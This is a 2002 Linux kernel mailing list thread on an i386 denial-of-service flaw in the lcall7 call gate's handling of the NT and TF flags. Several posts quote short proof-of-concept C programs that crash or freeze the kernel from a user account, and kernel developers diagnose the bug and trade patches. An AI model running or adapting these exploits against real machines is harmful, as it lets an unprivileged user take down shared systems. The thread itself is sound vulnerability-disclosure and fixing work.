2002-11-12 23:22:21

by Leif Sawyer

Subject: FW: i386 Linux kernel DoS

This was posted on bugtraq today...


-----Original Message-----
From: Christophe Devine
Sent: Monday, November 11, 2002 11:26 AM
To: [email protected]
Subject: i386 Linux kernel DoS

/* USE AT YOUR OWN RISK ! */

int main( void )
{
char dos[] = "\x9C" /* pushfd */
"\x58" /* pop eax */
"\x0D\x00\x01\x00\x00" /* or eax,100h */
"\x50" /* push eax */
"\x9D" /* popfd */
"\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */

void (* f)( void );

f = (void *) dos; (* f)();

return 1;
}


2002-11-12 23:25:02

by Christoph Hellwig

Subject: Re: FW: i386 Linux kernel DoS

On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> This was posted on bugtraq today...

A real segfaulting program? wow :)

2002-11-12 23:38:25

by Alan

Subject: Re: FW: i386 Linux kernel DoS

On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > This was posted on bugtraq today...
>
> A real segfaulting program? wow :)

Looks like the TF handling bug which was fixed a while ago

2002-11-13 23:31:35

by Jiri Kosina

Subject: Re: FW: i386 Linux kernel DoS

On 13 Nov 2002, Alan Cox wrote:

> > > This was posted on bugtraq today...
> > A real segfaulting program? wow :)
> Looks like the TF handling bug which was fixed a while ago

This was posted today ;) (uff, the two-side forwarded conversation ;) )

== cut here ==
From [email protected] Thu Nov 14 00:35:59 2002
Date: Wed, 13 Nov 2002 00:59:09 +0000
From: Christophe Devine <[email protected]>
To: [email protected]
Subject: Re: i386 Linux kernel DoS

On Wed, 13 Nov 2002, Stefan Laudat wrote:

> Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(

Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
long ebx, ecx, edx, esi, edi, ebp, eax;
unsigned short ds, __ds, es, __es;
unsigned short fs, __fs, gs, __gs;
long orig_eax, eip;
unsigned short cs, __cs;
long eflags, esp;
unsigned short ss, __ss;
};

int main( void )
{
int pid;
char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
void (* lcall7)( void ) = (void *) dos;
struct user_regs_struct d;

if( ! ( pid = fork() ) )
{
usleep( 1000 );
(* lcall7)();
}
else
{
ptrace( PTRACE_ATTACH, pid, 0, 0 );
while( 1 )
{
wait( 0 );
ptrace( PTRACE_GETREGS, pid, 0, &d );
d.eflags |= 0x4100; /* set TF and NT */
ptrace( PTRACE_SETREGS, pid, 0, &d );
ptrace( PTRACE_SYSCALL, pid, 0, 0 );
}
}

return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task
(NT) flag inside a lcall7.

== cut here ==

--
JiKos.


2002-11-13 23:53:55

by Chris Wright

Subject: Re: FW: i386 Linux kernel DoS

* Jirka Kosina ([email protected]) wrote:
> On 13 Nov 2002, Alan Cox wrote:
>
> > > > This was posted on bugtraq today...
> > > A real segfaulting program? wow :)
> > Looks like the TF handling bug which was fixed a while ago
>
> This was posted today ;) (uff, the two-side forwarded conversation ;) )
>

yeah, this has already been posted. as has a patch:

http://marc.theaimsgroup.com/?l=linux-kernel&m=103722485108857&w=2

thanks,
-chris
--
Linux Security Modules http://lsm.immunix.org http://lsm.bkbits.net

2002-11-14 02:59:31

by Andrea Arcangeli

Subject: Re: FW: i386 Linux kernel DoS

On Wed, Nov 13, 2002 at 12:10:19AM +0000, Alan Cox wrote:
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago

Program received signal SIGSEGV, Segmentation fault.
0xc01097d9 in restore_all ()
(gdb) bt
#0 0xc01097d9 in restore_all ()
#1 0xbfffe4b7 in ?? ()

c01097d9: cf iret

it's the NT not the TF. iret is called with NT set and the cpu
follows the back link which is zero (we never use hardware task
switching and nt is artificially set so it would lead to kernel
malfunction anyways).

the TF was fixed a while ago as you said and that's fine now.

we just can't allow userspace to set NT or iret will crash at ret from
userspace; furthermore there's nothing useful userspace can do with
the NT flag.

here is the fix, it applies to all 2.4 and 2.5:

--- 2.4.20rc1aa2/arch/i386/kernel/ptrace.c.~1~ Fri Aug 9 14:52:06 2002
+++ 2.4.20rc1aa2/arch/i386/kernel/ptrace.c Thu Nov 14 03:56:00 2002
@@ -28,7 +28,7 @@

/* determines which flags the user has access to. */
/* 1 = access 0 = no access */
-#define FLAG_MASK 0x00044dd5
+#define FLAG_MASK 0x00040dd5

/* set's the trap flag. */
#define TRAP_FLAG 0x100


Andrea

2002-11-14 04:04:23

by Andrea Arcangeli

Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 04:05:41AM +0100, Andrea Arcangeli wrote:
> On Wed, Nov 13, 2002 at 12:10:19AM +0000, Alan Cox wrote:
> > On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > > This was posted on bugtraq today...
> > >
> > > A real segfaulting program? wow :)
> >
> > Looks like the TF handling bug which was fixed a while ago
>
> Program received signal SIGSEGV, Segmentation fault.
> 0xc01097d9 in restore_all ()
> (gdb) bt
> #0 0xc01097d9 in restore_all ()
> #1 0xbfffe4b7 in ?? ()
>
> c01097d9: cf iret
>
> it's the NT not the TF. iret is called with NT set and the cpu
> follows the back link which is zero (we never use hardware task
> switching and nt is artificially set so it would lead to kernel
> malfunction anyways).
>
> the TF was fixed a while ago as you said and that's fine now.
>
> we just can't allow userspace to set NT or iret will crash at ret from
> userspace; furthermore there's nothing useful userspace can do with
> the NT flag.
>
> here is the fix, it applies to all 2.4 and 2.5:
>
> --- 2.4.20rc1aa2/arch/i386/kernel/ptrace.c.~1~ Fri Aug 9 14:52:06 2002
> +++ 2.4.20rc1aa2/arch/i386/kernel/ptrace.c Thu Nov 14 03:56:00 2002
> @@ -28,7 +28,7 @@
>
> /* determines which flags the user has access to. */
> /* 1 = access 0 = no access */
> -#define FLAG_MASK 0x00044dd5
> +#define FLAG_MASK 0x00040dd5
>
> /* set's the trap flag. */
> #define TRAP_FLAG 0x100

sorry, this is the wrong fix. It only happened to fix the problem for
the one working testcase out there, because that testcase used ptrace
to set the eflags instead of a simpler pushf/popf/lcall sequence like
this:

int main( void )
{
char dos[] = "\x9C" /* pushfd */
"\x58" /* pop eax */
"\x0D\x00\x41\x00\x00" /* or eax,4100h */
"\x50" /* push eax */
"\x9D" /* popfd */
"\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */

void (* f)( void );

f = (void *) dos; (* f)();

return 1;
}

(note the above is different from the one posted on bugtraq; it is a
simplified version of the "working" exploit posted to l-k)

I clearly misunderstood how NT works: it is read from the in-core
eflags, not from the copy on the stack, so my patch makes no difference
as far as the kernel is concerned. The only problem was again with
lcall, so the right fix is the last one from Petr. Sorry for the spam.

Andrea

2002-11-14 09:01:01

by Helge Hafting

Subject: Re: FW: i386 Linux kernel DoS

Jirka Kosina wrote:
[...]
> At the beginning I thought only kernels <= 2.4.18 were affected; but it
> appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
> The flaw seems to be related to the kernel's handling of the nested task
> (NT) flag inside a lcall7.

Ouch. That one froze up 2.5.47, running from a user account.
I couldn't recover with sysrq, but I was able to
emergency remount-ro avoiding the bootup fsck's.

Helge Hafting

2002-11-14 18:06:58

by Linus Torvalds

Subject: Re: FW: i386 Linux kernel DoS


Ok, the reason for this one is that we don't really emulate a
trap/interrupt gate correctly when taking a lcall. We _do_ set up the
stack to be identical, but a real trap/interrupt will also clear TF and NT
in EFLAGS on entry to the kernel (_after_ having saved the value off), and
our emulation code didn't do that.

So when we returned with an "iret", we had NT set in EFLAGS, causing the
iret to do all the wrong things.

This is my 2.5.x fix, I suspect it applies as-is to 2.4.x too. I don't
think anything has changed here in a long time.

Does anybody see anything else we're missing from the emulation path?

(Or path_s_, as I noticed after fixing the bug once already ;^p. We should
probably try to do this all as common code rather than having two separate
paths for lcall 0x7 and lcall 0x27 - the code is identical apart from one
little constant.. This looks like the minimal patch, though.)

Linus

-----
# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 02/11/14 [email protected] 1.848
# Fix impressive call gate misuse DoS reported on bugtraq.
# --------------------------------------------
# 02/11/14 [email protected] 1.849
# Duh. Fix the other lcall entry point too.
# --------------------------------------------
#
diff -Nru a/arch/i386/kernel/entry.S b/arch/i386/kernel/entry.S
--- a/arch/i386/kernel/entry.S Thu Nov 14 09:59:08 2002
+++ b/arch/i386/kernel/entry.S Thu Nov 14 09:59:08 2002
@@ -66,7 +66,9 @@
OLDSS = 0x38

CF_MASK = 0x00000001
+TF_MASK = 0x00000100
IF_MASK = 0x00000200
+DF_MASK = 0x00000400
NT_MASK = 0x00004000
VM_MASK = 0x00020000

@@ -134,6 +136,17 @@
movl %eax,EFLAGS(%esp) #
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
+
+ #
+ # Call gates don't clear TF and NT in eflags like
+ # traps do, so we need to do it ourselves.
+ # %eax already contains eflags (but it may have
+ # DF set, clear that also)
+ #
+ andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+ pushl %eax
+ popfl
+
movl %esp, %ebx
pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO
@@ -156,6 +169,17 @@
movl %eax,EFLAGS(%esp) #
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
+
+ #
+ # Call gates don't clear TF and NT in eflags like
+ # traps do, so we need to do it ourselves.
+ # %eax already contains eflags (but it may have
+ # DF set, clear that also)
+ #
+ andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+ pushl %eax
+ popfl
+
movl %esp, %ebx
pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO

2002-11-14 18:54:34

by Andrea Arcangeli

Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 10:12:53AM -0800, Linus Torvalds wrote:
>
> Ok, the reason for this one is that we don't really emulate a
> trap/interrupt gate correctly when taking a lcall. We _do_ set up the
> stack to be identical, but a real trap/interrupt will also clear TF and NT

actually TF should be cleared implicitly in do_debug, or it could get
the single step trap before you can clear TF explicitly in entry.S.
But it's certainly zero-cost to clear it explicitly there too, just to
remember it's one of the bits not cleared implicitly in hardware when
entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
still missing.

basically you need to add this check in do_debug too:

--- x/arch/i386/kernel/traps.c.~1~ Fri Aug 9 14:52:06 2002
+++ x/arch/i386/kernel/traps.c Thu Nov 14 19:57:42 2002
@@ -514,10 +514,14 @@ asmlinkage void do_debug(struct pt_regs
{
unsigned int condition;
struct task_struct *tsk = current;
+ unsigned long eip = regs->eip;
siginfo_t info;

__asm__ __volatile__("movl %%db6,%0" : "=r" (condition));

+ if ((eip >=PAGE_OFFSET) && (regs->eflags & TF_MASK))
+ goto clear_TF;
+
/* Mask out spurious debug traps due to lazy DR7 setting */
if (condition & (DR_TRAP0|DR_TRAP1|DR_TRAP2|DR_TRAP3)) {
if (!tsk->thread.debugreg[7])


or maybe I'm missing something and 2.5 fixes it in another way that I
didn't notice.

> in EFLAGS on entry to the kernel (_after_ having saved the value off), and
> our emulation code didn't do that.
>
> So when we returned with an "iret", we had NT set in EFLAGS, causing the
> iret to do all the wrong things.

Yep.

Andrea

2002-11-14 19:11:20

by Linus Torvalds

Subject: Re: FW: i386 Linux kernel DoS


On Thu, 14 Nov 2002, Andrea Arcangeli wrote:
>
> actually TF should be cleared implicitly in the do_debug or it could get
> the single step trap before you can clear TF explicitly in the entry.S.

But that's fine. Getting a single step trap in the kernel is not a
problem: the trap will clear TF/NT on the "recursive" kernel entry, and on
the recursive "iret" nothing bad will happen.

Remember: what is on the _stack_ doesn't matter. The only thing that
matters is what is actually in the EFLAGS register itself.

> but it's certainly zerocost to clear it explicitly there too just to
> remember it's one of the bits not cleared implicitly in hardware when
> entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
> still missing.

No, do_debug() already does

/* Mask out spurious TF errors due to lazy TF clearing */
if (condition & DR_STEP) {
if ((regs->xcs & 3) == 0)
goto clear_TF;

which will make sure that we only get _one_ of these spurious (and
harmless) TF traps if somebody tries to mess with us.

So that is correct (and your patch is _not_ correct - it's not right
checking what the EIP value is, since it doesn't matter. In fact, I think
you could quite validly have "big" EIP values in user space by just
creating interesting code segments).

Linus

2002-11-14 19:59:59

by Petr Vandrovec

Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 10:12:53AM -0800, Linus Torvalds wrote:
>
> (Or path_s_, as I noticed after fixing the bug once already ;^p. We should
> probably try to do this all as common code rather than having two separate
> paths for lcall 0x7 and lcall 0x27 - the code is identical apart from one
> little constant.. This looks like the minimal patch, though.)

What about this? It even generates shorter code in each branch, as
movl xx(%esp),%yy is 4 byte, while movl xx(%ebx),%yy is 3 byte opcode.

I also converted "movl 4(%edx),%edx; call *%edx" to "call *4(%edx)", 2 bytes
and one opcode shorter. I hope that it is also faster...

Appears to work...
Petr Vandrovec
[email protected]

---

lcall7 and lcall27 paths differ only in one constant. Let's push the
constant first, and then run the common code.

entry.S | 47 ++++++++++++-----------------------------------
1 files changed, 12 insertions(+), 35 deletions(-)

--- linux-2.5.47-c849.dist/arch/i386/kernel/entry.S 2002-11-14 19:38:33.000000000 +0100
+++ linux-2.5.47-c849/arch/i386/kernel/entry.S 2002-11-14 20:53:26.000000000 +0100
@@ -130,12 +130,16 @@
# gates, which has to be cleaned up later..
pushl %eax
SAVE_ALL
- movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
- movl CS(%esp), %edx # this is eip..
- movl EFLAGS(%esp), %ecx # and this is cs..
- movl %eax,EFLAGS(%esp) #
- movl %edx,EIP(%esp) # Now we move them to their "normal" places
- movl %ecx,CS(%esp) #
+ movl %esp, %ebx
+ pushl %ebx
+ pushl $0x7
+do_lcall:
+ movl EIP(%ebx), %eax # due to call gates, this is eflags, not eip..
+ movl CS(%ebx), %edx # this is eip..
+ movl EFLAGS(%ebx), %ecx # and this is cs..
+ movl %eax,EFLAGS(%ebx) #
+ movl %edx,EIP(%ebx) # Now we move them to their "normal" places
+ movl %ecx,CS(%ebx) #

#
# Call gates don't clear TF and NT in eflags like
@@ -147,13 +151,9 @@
pushl %eax
popfl

- movl %esp, %ebx
- pushl %ebx
andl $-8192, %ebx # GET_THREAD_INFO
movl TI_EXEC_DOMAIN(%ebx), %edx # Get the execution domain
- movl 4(%edx), %edx # Get the lcall7 handler for the domain
- pushl $0x7
- call *%edx
+ call *4(%edx) # Call the lcall7 handler for the domain
addl $4, %esp
popl %eax
jmp resume_userspace
@@ -163,33 +163,10 @@
# gates, which has to be cleaned up later..
pushl %eax
SAVE_ALL
- movl EIP(%esp), %eax # due to call gates, this is eflags, not eip..
- movl CS(%esp), %edx # this is eip..
- movl EFLAGS(%esp), %ecx # and this is cs..
- movl %eax,EFLAGS(%esp) #
- movl %edx,EIP(%esp) # Now we move them to their "normal" places
- movl %ecx,CS(%esp) #
-
- #
- # Call gates don't clear TF and NT in eflags like
- # traps do, so we need to do it ourselves.
- # %eax already contains eflags (but it may have
- # DF set, clear that also)
- #
- andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
- pushl %eax
- popfl
-
movl %esp, %ebx
pushl %ebx
- andl $-8192, %ebx # GET_THREAD_INFO
- movl TI_EXEC_DOMAIN(%ebx), %edx # Get the execution domain
- movl 4(%edx), %edx # Get the lcall7 handler for the domain
pushl $0x27
- call *%edx
- addl $4, %esp
- popl %eax
- jmp resume_userspace
+ jmp do_lcall


ENTRY(ret_from_fork)

2002-11-15 02:06:34

by Andrea Arcangeli

Subject: Re: FW: i386 Linux kernel DoS

On Thu, Nov 14, 2002 at 11:17:47AM -0800, Linus Torvalds wrote:
>
> On Thu, 14 Nov 2002, Andrea Arcangeli wrote:
> >
> > actually TF should be cleared implicitly in the do_debug or it could get
> > the single step trap before you can clear TF explicitly in the entry.S.
>
> But that's fine. Getting a single step trap in the kernel is not a
> problem: the trap will clear TF/NT on the "recursive" kernel entry, and on
> the recursive "iret" nothing bad will happen.
>
> Remember: what is on the _stack_ doesn't matter. The only thing that

yes.

> matters is what is actually in the EFLAGS register itself.
>
> > but it's certainly zerocost to clear it explicitly there too just to
> > remember it's one of the bits not cleared implicitly in hardware when
> > entering via lcall. However in 2.5 it seems the clear_TF in do_debug is
> > still missing.
>
> No, do_debug() already does
>
> /* Mask out spurious TF errors due to lazy TF clearing */
> if (condition & DR_STEP) {
> if ((regs->xcs & 3) == 0)
> goto clear_TF;
>
> which will make sure that we only get _one_ of these spurious (and
> harmless) TF traps if somebody tries to mess with us.
>
> So that is correct (and your patch is _not_ correct - it's not right
> checking what the EIP value is, since it doesn't matter. In fact, I think
> you could quite validly have "big" EIP values in user space by just
> creating interesting code segments).

actually I just had to work around that code for kgdb, and yes, vsyscalls
would run above PAGE_OFFSET too. OTOH I no longer see the point of the
patch I posted that is included in 2.4.20rc1. I wrongly assumed that
setting TF would not guarantee DR_STEP to be set in db6 (there would be
no other reason for such a patch), but according to the manual this
isn't the case. So 2.5 is correct and 2.4.20rc1 is overkill, and I'll
back out that patch too; that will also avoid the ugly workaround with
kgdb (which basically disabled the eip check as soon as kgdb was
started). If anybody can see a problem in backing out from 2.4 the patch
I was suggesting for 2.5, please let me know. Thanks.

Andrea

2002-11-16 19:26:26

by Krzysiek Taraszka

Subject: Re: FW: i386 Linux kernel DoS

On 13 Nov 2002, Alan Cox wrote:

> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago

It wasn't fixed for 2.2.22. 2.2 has only lcall7, so the fix should be
trivial, shouldn't it?
It should look like:


diff -urN linux.orig/arch/i386/kernel/entry.S linux/arch/i386/kernel/entry.S
--- linux.orig/arch/i386/kernel/entry.S Tue May 21 01:32:34 2002
+++ linux/arch/i386/kernel/entry.S Thu Nov 14 21:39:36 2002
@@ -63,7 +63,9 @@
OLDSS = 0x38

CF_MASK = 0x00000001
+TF_MASK = 0x00000100
IF_MASK = 0x00000200
+DF_MASK = 0x00000400
NT_MASK = 0x00004000
VM_MASK = 0x00020000

@@ -139,6 +141,9 @@
movl CS(%esp),%edx # this is eip..
movl EFLAGS(%esp),%ecx # and this is cs..
movl %eax,EFLAGS(%esp) #
+ andl $~(NT_MASK|TF_MASK|DF_MASK), %eax
+ pushl %eax
+ popfl
movl %edx,EIP(%esp) # Now we move them to their "normal" places
movl %ecx,CS(%esp) #
movl %esp,%ebx


or am I missing something?

Krzysiek Taraszka ([email protected])